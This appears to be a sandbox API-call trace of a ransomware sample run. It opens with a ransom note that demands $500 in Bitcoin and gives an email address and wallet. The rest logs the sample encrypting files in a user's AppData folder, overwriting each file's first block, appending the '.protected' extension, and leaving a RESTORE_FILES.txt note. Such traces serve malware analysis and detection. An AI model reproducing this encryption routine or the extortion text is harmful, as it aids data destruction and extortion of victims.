SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.772] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0089.775] lstrlenA (lpString="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") returned 684 [0089.775] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0089.775] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.775] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0089.776] CloseHandle (hObject=0xd8) returned 1 [0089.776] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0089.776] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0089.776] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt") returned 78 [0089.776] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Identities\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\identities\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.777] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0089.777] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0089.778] lstrlenA (lpString="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") returned 684 [0089.778] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0089.779] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0089.779] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0089.779] CloseHandle (hObject=0xd4) returned 1 [0089.779] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Windows") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Program Files") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="Program Files (x86)") returned -1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="$Recycle.bin") returned 1 [0089.779] lstrcmpiW (lpString1="Ko6mG1GJe.pps", lpString2="System Volume Information") returned -1 [0089.779] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.779] StrStrIW (lpFirst="Ko6mG1GJe.pps", lpSrch=".protected") returned 0x0 [0089.779] lstrcmpW (lpString1="Ko6mG1GJe.pps", lpString2="RESTORE_FILES.txt") returned -1 [0089.779] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.779] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.780] StrStrW (lpFirst="Ko6mG1GJe.pps", lpSrch=".txt") returned 0x0 [0089.780] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.780] StrStrW 
(lpFirst="Ko6mG1GJe.pps", lpSrch=".rar") returned 0x0 [0089.781] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps") returned 63 [0089.781] StrStrW (lpFirst="Ko6mG1GJe.pps", lpSrch=".zip") returned 0x0 [0089.781] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.782] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.782] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.783] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.783] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.783] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.783] CloseHandle (hObject=0xd4) returned 1 [0089.786] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps.protected") returned 73 [0089.786] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\Ko6mG1GJe.pps.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ko6mg1gje.pps.protected")) returned 1 [0089.788] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Windows") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Program Files") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="Program Files (x86)") returned -1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="$Recycle.bin") returned 1 [0089.788] lstrcmpiW (lpString1="lMoDm7a.bmp", lpString2="System Volume Information") returned -1 [0089.788] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.788] StrStrIW (lpFirst="lMoDm7a.bmp", lpSrch=".protected") returned 0x0 [0089.788] lstrcmpW (lpString1="lMoDm7a.bmp", lpString2="RESTORE_FILES.txt") returned -1 [0089.788] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.788] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".txt") returned 0x0 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".rar") returned 0x0 [0089.789] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp") returned 61 [0089.789] StrStrW (lpFirst="lMoDm7a.bmp", lpSrch=".zip") returned 0x0 [0089.790] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.790] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.790] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.791] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.792] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.792] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.792] CloseHandle (hObject=0xd4) returned 1 [0089.793] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp.protected") returned 71 [0089.793] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp"), 
lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\lMoDm7a.bmp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lmodm7a.bmp.protected")) returned 1 [0089.794] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Windows") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Program Files") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="Program Files (x86)") returned -1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="$Recycle.bin") returned 1 [0089.794] lstrcmpiW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="System Volume Information") returned -1 [0089.794] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrIW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".protected") returned 0x0 [0089.795] lstrcmpW (lpString1="Lrk1qHpo08_IT3Y.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.795] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.795] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW 
(lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".txt") returned 0x0 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".rar") returned 0x0 [0089.795] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav") returned 69 [0089.795] StrStrW (lpFirst="Lrk1qHpo08_IT3Y.wav", lpSrch=".zip") returned 0x0 [0089.796] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.796] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.796] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.797] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.797] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.797] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.797] CloseHandle (hObject=0xd4) returned 1 [0089.798] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav.protected") returned 79 [0089.798] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Lrk1qHpo08_IT3Y.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lrk1qhpo08_it3y.wav.protected")) returned 1 [0089.799] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Windows") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Program Files") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="Program Files (x86)") returned -1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="$Recycle.bin") returned 1 [0089.799] lstrcmpiW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="System Volume Information") returned -1 [0089.799] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrIW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".protected") returned 0x0 [0089.800] lstrcmpW (lpString1="LWwzS7eC2c7 PDx.gif", lpString2="RESTORE_FILES.txt") returned -1 [0089.800] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.800] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.800] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".txt") returned 0x0 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".rar") returned 0x0 [0089.800] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif") returned 69 [0089.800] StrStrW (lpFirst="LWwzS7eC2c7 PDx.gif", lpSrch=".zip") returned 0x0 [0089.801] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.802] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.802] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.803] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.803] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.803] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.803] CloseHandle (hObject=0xd4) returned 1 [0089.804] wnsprintfW (in: 
pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif.protected") returned 79 [0089.804] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\LWwzS7eC2c7 PDx.gif.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\lwwzs7ec2c7 pdx.gif.protected")) returned 1 [0089.805] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Windows") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Program Files") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="Program Files (x86)") returned -1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="$Recycle.bin") returned 1 [0089.805] lstrcmpiW (lpString1="l_2UP2Jf.gif", lpString2="System Volume Information") returned -1 [0089.805] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.805] StrStrIW (lpFirst="l_2UP2Jf.gif", lpSrch=".protected") returned 0x0 [0089.805] lstrcmpW (lpString1="l_2UP2Jf.gif", lpString2="RESTORE_FILES.txt") returned -1 [0089.805] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.805] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\roaming\\l_2up2jf.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".txt") returned 0x0 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".rar") returned 0x0 [0089.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\l_2UP2Jf.gif") returned 62 [0089.806] StrStrW (lpFirst="l_2UP2Jf.gif", lpSrch=".zip") returned 0x0 [0089.806] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.807] SetFilePointerEx 